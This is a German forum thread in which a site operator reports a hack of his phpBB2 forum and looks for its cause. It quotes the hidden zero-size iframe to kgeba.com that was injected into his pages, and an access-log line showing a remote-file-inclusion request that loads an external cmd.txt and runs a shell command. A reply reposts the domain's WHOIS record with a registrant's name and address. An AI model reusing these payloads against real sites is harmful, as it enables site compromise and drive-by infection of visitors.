Ergebnis 1 bis 3 von 3

Thema: phpBB2-Forenhack www.kgeba.com

  1. #1
    Mitglied
    Registriert seit
    17.07.2005
    Beiträge
    321

    Standard phpBB2-Forenhack www.kgeba.com

    Heute nacht um 02:42 wurde offensichtlich eines meiner phpBB2-Foren gehackt und an jede index.htm und verschiedene .php-Dateien folgendes angehängt:

    [HTML]<br><html><iframe src=http://www.kgeba.com/portal/index.php?aff=eduardo width=0 Sheight=0 frameborder=0 Sscrolling=no></iframe></html>[/HTML]

    sinnigerweise nach /html bzw dem php-end-tag, so dass es dem Besucher nicht weiter auffällt.
    IP war 200.97.214.1 bzw.200.182.227.94. Google sagt darüber noch nichts. Weiß jemand näheres?
    Geändert von brk (09.07.2006 um 19:56 Uhr)
    Das Reh springt hoch, das Reh springt weit, warum auch nicht, es hat ja Zeit.

  2. #2
    Mitglied Avatar von Q__
    Registriert seit
    22.02.2006
    Ort
    Continuum
    Beiträge
    398

    Standard

    Na, herzliche Grüße aus Curaçao...

    War Dein phpBB aktuell oder älteren Update-Stands???
    Nur so informativ für alle Forenbetreiber...

    Q

    Code:
    < Registration Service Provided By: Gold-Domain, Inc.
    < Contact: support @ gold-domain . com
    < Visit: http://www.gold-domain.com
    < 
    < Domain name: www.kgeba.com
    < 
    < Registrant Contact:
    < ShuPin
    < Fan ShuangPing (
    
    [Link nur für registrierte Mitglieder sichtbar. 
    
    ])
    < +1.3913306350
    < Fax: none
    < 26th middle school
    < Jiaozuo, Henan 454100
    < CN
    < 
    < Administrative Contact:
    < ShuPin
    < Fan ShuangPing (
    
    [Link nur für registrierte Mitglieder sichtbar. 
    
    ])
    < +1.3913306350
    < Fax: none
    < 26th middle school
    < Jiaozuo, Henan 454100
    < CN
    < 
    < Technical Contact:
    < ShuPin
    < Fan ShuangPing (
    
    [Link nur für registrierte Mitglieder sichtbar. 
    
    ])
    < +1.3913306350
    < Fax: none
    < 26th middle school
    < Jiaozuo, Henan 454100
    < CN
    < 
    < Status: Locked
    < 
    < Name Servers:
    < dns1.name-services.com
    < dns2.name-services.com
    < dns3.name-services.com
    < dns4.name-services.com
    < dns5.name-services.com
    < 
    < Creation date: 12 Dec 2005 08:34:01
    < Expiration date: 12 Dec 2006 08:34:01
    Live long and prosper =/\=

  3. #3
    Mitglied
    Registriert seit
    17.07.2005
    Beiträge
    321

    Standard

    ich glaube, mittlerweile die Schwachstelle gefunden zu haben:

    ein älteres phpBB2-Forum (2.06) als Modul unter mambo, das zwar deaktiviert, aber nicht gelöscht war:

    200.97.214.1 - - [09/Jul/2006:02:41:48 +0200] "GET /components/com_forum/downloads.php?phpbb_root_path=http://geocities.yahoo.com.br/juventudedosamba2003/cmd.txt?&cmd=ls%20-l%20/kunden/XXXXXX_XXXXX HTTP/1.1"
    Das Reh springt hoch, das Reh springt weit, warum auch nicht, es hat ja Zeit.

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Partnerlink:
REDDOXX Anti-Spam Lösungen